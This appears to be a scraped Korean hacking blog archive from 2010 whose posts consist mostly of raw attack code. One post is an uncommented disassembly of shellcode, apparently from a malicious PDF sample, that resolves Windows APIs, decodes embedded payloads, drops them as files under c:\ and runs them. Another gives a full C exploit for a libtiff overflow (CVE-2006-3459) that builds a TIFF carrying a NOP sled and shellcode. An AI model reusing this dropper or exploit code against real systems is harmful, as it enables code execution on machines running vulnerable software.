2010. 7. 22. 11:01
728x90
main.txt728x90
'리버싱 > 공부를 위한 샘플들' 카테고리의 다른 글
| 바이러스 소스라는데 아직 못봤음 (0) | 2010.07.22 |
|---|---|
| pdf 취약성 파일 드디어 구했구나...ㅡㅡ 개 힘드네 바이러스 구하기도 젠장; 근데 어느 회사에서 샘플도 제공해주는구나 ㅋㅋ 개 고맙군 ㅎ (0) | 2010.07.22 |
2010. 7. 22. 10:26
728x90
call $+5
push 0Ch
jmp short loc_401099
db 4Ch, 22h, 80h
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh
dd 2E657461h, 657865h, 0
dd 5C3A6300h, 61746164h, 4558452Eh, 0
dd 5C3A6300h, 61746164h, 4E49622Eh, 0
db 0
loc_401099:
pop ecx
pop edi
scasd
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
loc_4010AB:
push ecx
mov esi, [ebp+3Ch]
mov esi, [esi+ebp+78h]
add esi, ebp
push esi
mov esi, [esi+20h]
add esi, ebp
xor ecx, ecx
dec ecx
loc_4010BE:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx
loc_4010C4:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4
loc_4010D3:
cmp ebx, [edi]
jnz short loc_4010BE
pop esi
mov ebx, [esi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [esi+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
stosd
pop ecx
loop loc_4010AB
sub edi, 38h
xor esi, esi
loc_4010F4:
inc esi
lea eax, [edi+80h]
push eax
push esi
call dword ptr [edi+18h]
cmp eax, 0FFFFFFFFh
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4
mov [edi+4], eax
mov [edi+80h], esi
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]
mov [edi+7Ch], eax
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]
cmp eax, 0FFFFFFFFh
jz short loc_40118B
push 0
lea ebx, [edi+90h]
push ebx
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]
mov ecx, [edi+90h]
sub ecx, 0Ah
mov eax, [edi+7Ch]
loc_401158:
inc eax
cmp dword ptr [eax], 4B435646h
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E
loc_40116A:
loop loc_401158
jmp short loc_40118B
loc_40116E:
add eax, 8
mov [edi+94h], eax
loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197
loc_401189:
loop loc_401177
loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]
jnz loc_4010F4
loc_401197:
mov [edi+98h], eax
push 2
lea esi, [edi+3Fh]
push esi
call dword ptr [edi+20h]
mov [edi], eax
push 2
lea esi, [edi+58h]
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax
push 2
lea esi, [edi+68h]
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax
mov ebx, [edi+98h]
sub ebx, [edi+94h]
mov eax, [edi+94h]
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx
add eax, 4
mov esi, eax
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]
push dword ptr [edi]
call dword ptr [edi+1Ch]
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]
push eax
lea esi, [edi+3Fh]
mov edx, esi
loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262
loc_40126B:
mov byte ptr [edx-1], 20h
pop ecx
loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270
loc_40127C:
mov [edx], al
sub esi, 7
call $+5
add [esp+4+var_4], 0Dh
push 0
push esi
push dword ptr [edi+2Ch]
jmp dword ptr [edi+0Ch]
start endp
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends
728x90
'bof' 카테고리의 다른 글
| arm bof에 대한 문서 (0) | 2011.02.11 |
|---|---|
| bof 문서들 (0) | 2010.07.22 |
| RTL BOF : (Return To Library Buffer Over Flow) (0) | 2010.06.03 |
| bof ppt 정리 (0) | 2010.03.28 |
| bof 공격 (0) | 2010.03.28 |
2010. 7. 22. 09:47
728x90
#include <stdio.h>
#include <string.h>
#include <tiffio.h>
#include <stdlib.h>
#include <stdbool.h>
/*
* basic exploit for CVE-2006-3459.
*
* $ ./a.out
* [*] creating exploit.tif, target address: 0xb7959000
* [*] marker tag found at offset 524418.
* [*] success.
* $ display exploit.tif
* uid=1000(taviso) gid=100(users) groups=10(wheel)
*
* -- taviso@gentoo.org
*/
/* size of nop sled */
#define SLEDSIZ (2048 << 8)
/* get this address by printing tif->tif_base in a debugger */
#define RETADDR (0xb7919000 + SLEDSIZ/2)
#define MARKER 0xc0de /* this must be unique, make it anything */
unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80";
TIFFFieldInfo badfield = {
MARKER, /* a unique unsigned short we search for */
100, /* number of shorts to read onto stack */
100, /* number we want to write into file */
TIFF_SHORT, /* data type */
FIELD_CUSTOM, /* field bit */
1, /* okay to change? */
0, /* passcount */
"Exploit" /* a name, unused */
};
int main(int argc, char **argv)
{
TIFF *tif;
FILE *mod;
unsigned char *buf;
unsigned short d;
unsigned f[badfield.field_readcount], i;
fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR);
/* prepare a buffer containing address of shellcode */
for (i = 0; i < badfield.field_readcount; i++)
f[i] = RETADDR;
/* open the target exploit file */
if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
fprintf(stderr, "[!] failed to open target.\n");
return 1;
}
/* teach libtiff about made up tag */
TIFFMergeFieldInfo(tif, &badfield, 1);
/* install basic required tags */
TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode));
TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);
/* now send buffer containing return addresses */
TIFFSetField(tif, MARKER, &f);
if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) {
fprintf(stderr, "[!] sorry, memory allocation error.\n");
}
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
/* disguise nop sled and shellcode as image data */
TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode));
TIFFClose(tif);
/* okay, now open the file to find the marker taag */
if ((mod = fopen("exploit.tif", "r+")) == NULL) {
fprintf(stderr, "[!] failed to open target.\n");
return 1;
}
/* try to find the MARKER by continually reading shorts. */
/* yes, this is ugly. */
while (true) {
if (fread(&d, sizeof(short), 1, mod) < 1) {
fprintf(stderr, "[!] failed to find marker.\n");
return 1;
}
if (d == MARKER) {
fprintf(stderr, "[*] marker tag found at offset %d.\n",
ftell(mod) - sizeof(short));
/* rewind ready to overwrite it */
if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) {
fprintf(stderr, "[!] failed to reposition file.\n");
return 1;
}
/* i'll use dot range */
d = TIFFTAG_DOTRANGE;
/* write it in */
if (fwrite(&d, sizeof(short), 1, mod) < 1) {
fprintf(stderr, "[!] failed to write new tag number.\n");
}
break;
} else {
if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) {
fprintf(stderr, "[!] failed to reposition file.\n");
return 1;
}
}
}
fclose(mod);
fprintf(stderr, "[*] success.\n");
return 0;
}
728x90
'그외 해킹기술' 카테고리의 다른 글
| Inside an APT Covert Communications Channel(번역하려고했지만...역시 귀찮군;;;)대충 해석됩니다. ㅎㅎㅎ (0) | 2011.08.17 |
|---|---|
| pdf 파일 분석 툴 (0) | 2010.07.26 |
| 2007 kisa 취약점 분석 문서 (0) | 2010.07.22 |
| adobe 최근 취약점 (0) | 2010.07.22 |
| State of the art in CRiMEPACK Exploit Pack (0) | 2010.07.22 |
2010. 7. 22. 09:43
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.